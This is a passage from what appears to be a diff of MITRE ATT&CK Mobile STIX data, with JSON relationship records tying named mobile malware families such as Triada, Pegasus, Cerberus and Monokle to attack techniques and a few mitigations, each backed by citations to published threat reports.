"https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:15:05.454Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can access SMS messages.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5b5586b9-75ee-476f-b3eb-49878254302c", + "type": "relationship", + "created": "2019-07-16T14:33:12.117Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Triada June 2019", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019." + } + ], + "modified": "2020-04-27T16:52:49.643Z", + "description": "[Triada](https://attack.mitre.org/software/S0424) is able to modify code within the com.android.systemui application to gain access to `GET_REAL_TASKS` permissions. This permission enables access to information about applications currently on the foreground and other recently used apps.(Citation: Google Triada June 2019) ", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--119b848b-84b4-4f86-a265-0c9eb8680072", + "created": "2021-10-01T14:42:49.171Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can be controlled via IRC using freenode.net servers.(Citation: SecureList BusyGasper)", + "modified": "2022-04-18T19:01:58.546Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--939808a7-121d-467a-b028-4441ee8b7cee", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f88cbb0c-ca34-4a87-82fa-e0e567ee8d57", + "type": "relationship", + "created": "2020-04-08T15:51:25.120Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ThreatFabric Ginp", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020." + } + ], + "modified": "2020-04-08T15:51:25.120Z", + "description": "[Ginp](https://attack.mitre.org/software/S0423) obfuscates its payload, code, and strings.(Citation: ThreatFabric Ginp)", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9cfcda7d-bb82-4122-a38b-fec4f5532856", + "created": "2020-05-04T14:04:56.211Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Bread", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020.", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:03:51.504Z", + "description": "[Bread](https://attack.mitre.org/software/S0432) communicates with the C2 server using HTTP requests.(Citation: Google Bread)", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d300eb82-5ca0-48aa-a45f-d34242545e27", + "created": "2022-03-30T15:08:28.814Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation could detect unauthorized operating system modifications. ", + "modified": "2022-03-30T15:08:28.814Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--97417113-1840-4e00-98d3-bb222e1a1f60", + "type": "relationship", + "created": "2020-07-27T14:14:56.980Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Security Zen", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020." + } + ], + "modified": "2020-08-10T22:18:20.815Z", + "description": "[Zen](https://attack.mitre.org/software/S0494) base64 encodes one of the strings it searches for.(Citation: Google Security Zen)", + "relationship_type": "uses", + "source_ref": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3364dd33-c012-4aaf-852b-86e63bd724ac", + "created": "2023-02-06T19:38:22.312Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + }, + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-11T22:06:53.022Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can gather session cookies from infected devices. [S.O.V.A.](https://attack.mitre.org/software/S1062) can also abuse Accessibility Services to steal Google Authenticator tokens.(Citation: threatfabric_sova_0921)(Citation: cleafy_sova_1122)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7d481598-ece7-469c-b231-619a804c25e5", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:34:25.318Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) captures SMS messages that the victim sends or receives.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--efd35b6f-7a61-4998-97ff-608547e40f66", + "created": "2019-10-01T14:23:44.054Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": " [Rotexy](https://attack.mitre.org/software/S0411) encrypts JSON HTTP payloads with AES.(Citation: securelist rotexy 2018) ", + "modified": "2022-04-18T16:07:57.631Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--51bf6ffc-85c7-4910-8821-9736a1ec60f1", + "created": "2019-09-04T15:38:57.037Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "FlexiSpy-Features", + "url": "https://www.flexispy.com/en/features-overview.htm", + "description": "FlexiSpy. (n.d.). FlexiSpy Monitoring Features. Retrieved September 4, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can record keystrokes and analyze them for keywords.(Citation: FlexiSpy-Features)", + "modified": "2022-04-15T17:34:17.813Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1f44936e-b84c-404f-a92e-6fb7e24b5435", + "created": "2022-04-05T19:51:08.770Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android 12 Features", + "url": "https://developer.android.com/about/versions/12/features", + "description": "Google. (2022, April 4). Features and APIs Overview. Retrieved April 5, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "The `HIDE_OVERLAY_WINDOWS` permission was introduced in Android 12 allowing apps to hide overlay windows of type `TYPE_APPLICATION_OVERLAY` drawn by other apps with the `SYSTEM_ALERT_WINDOW` permission, preventing other applications from creating overlay windows on top of the current application.(Citation: Android 12 Features)", + "modified": "2022-04-05T19:51:08.770Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a503ca06-7f98-4ab4-a8fc-ff55c3da7f0a", + "created": "2020-10-29T19:21:23.143Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020.", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:48:18.023Z", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) has registered to receive the `BOOT_COMPLETED` broadcast intent to activate on device startup.(Citation: WeLiveSecurity AdDisplayAshas)", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--212801c2-5d14-4381-b25a-340cda11a5ac", + "created": "2020-12-18T20:14:47.310Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has displayed a form to collect user data after installation.(Citation: WhiteOps TERRACOTTA)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--68e5789c-9f60-421e-9c79-fae207a29e83", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:27:20.839Z", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) stole SMS message content.(Citation: Kaspersky-WUC)", + "relationship_type": "uses", + "source_ref": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--34f9aed0-48a7-4815-8456-5541a7b8210f", + "created": "2019-09-04T14:28:16.487Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-Monokle", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Monokle](https://attack.mitre.org/software/S0407) can record the user's keystrokes.(Citation: Lookout-Monokle)", + "modified": "2022-04-15T17:34:52.414Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--24951cfe-d3ce-4802-86ff-028fc9cbbe53", + "type": "relationship", + "created": "2020-07-15T20:20:59.318Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-07-15T20:20:59.318Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) uses foreground persistence to keep a service running. It shows the user a transparent notification to evade detection.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5aa167b8-4166-440b-b49f-bf1bab597237", + "created": "2019-11-21T16:42:48.441Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:39:13.309Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can collect the device’s call log.(Citation: SecureList - ViceLeaker 2019)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--78fc4506-5c80-4638-8f51-44a2e28f7aaf", + "type": "relationship", + "created": "2020-09-11T15:43:49.309Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + } + ], + "modified": "2020-09-11T15:43:49.309Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can send SMS messages from a device.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4449ac76-8329-4483-b152-99b990006cbc", + "created": "2019-09-04T15:38:56.937Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "FlexiSpy-Features", + "description": "FlexiSpy. (n.d.). FlexiSpy Monitoring Features. Retrieved September 4, 2019.", + "url": "https://www.flexispy.com/en/features-overview.htm" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:58:10.115Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can collect a list of known Wi-Fi access points.(Citation: FlexiSpy-Features) ", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9634001c-575b-47aa-acd2-c3b1e900bd0b", + "type": "relationship", + "created": "2020-12-17T20:15:22.397Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + } + ], + "modified": "2020-12-17T20:15:22.397Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can steal data from various sources, including chat, communication, and social media apps.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0fd34764-8a5d-43da-9bdf-5a0b7e436936", + "created": "2019-08-29T18:57:55.926Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Samsung Keyboards", + "url": "https://support.samsungknox.com/hc/en-us/articles/360001485027-3rd-party-keyboards-must-be-whitelisted-", + "description": "Samsung. (2019, August 16). 3rd party keyboards must be whitelisted.. Retrieved September 1, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "When using Samsung Knox, third-party keyboards must be explicitly added to an allow list in order to be available to the end-user.(Citation: Samsung Keyboards) An EMM/MDM can use the Android `DevicePolicyManager.setPermittedAccessibilityServices` method to set an explicit list of applications that are allowed to use Android's accessibility features. ", + "modified": "2022-04-05T19:41:57.905Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a9e97a14-ea3c-47b1-a865-0a1edea9c81c", + "type": "relationship", + "created": "2021-02-17T20:43:52.410Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." + } + ], + "modified": "2021-02-17T20:43:52.410Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has searched for pdf, doc, docx, ppt, pptx, xls, and xlsx file types for exfiltration.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--baa82c0a-b51c-4d4a-ae1d-6d6fd637f78d", + "type": "relationship", + "created": "2020-07-15T20:20:59.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-07-15T20:20:59.294Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can obtain a list of installed applications.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9d72c60b-d5d1-4b50-a01f-3882ddb335d9", + "created": "2019-09-04T14:28:15.316Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:26:48.912Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can remount the system partition as read/write to install attacker-specified certificates.(Citation: Lookout-Monokle) ", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--79ef0025-3e1c-4914-9873-19808c2a5bec", + "created": "2023-02-28T21:44:22.373Z", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T21:44:22.373Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can record the screen and stream the data off the device.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_deprecated": false, + 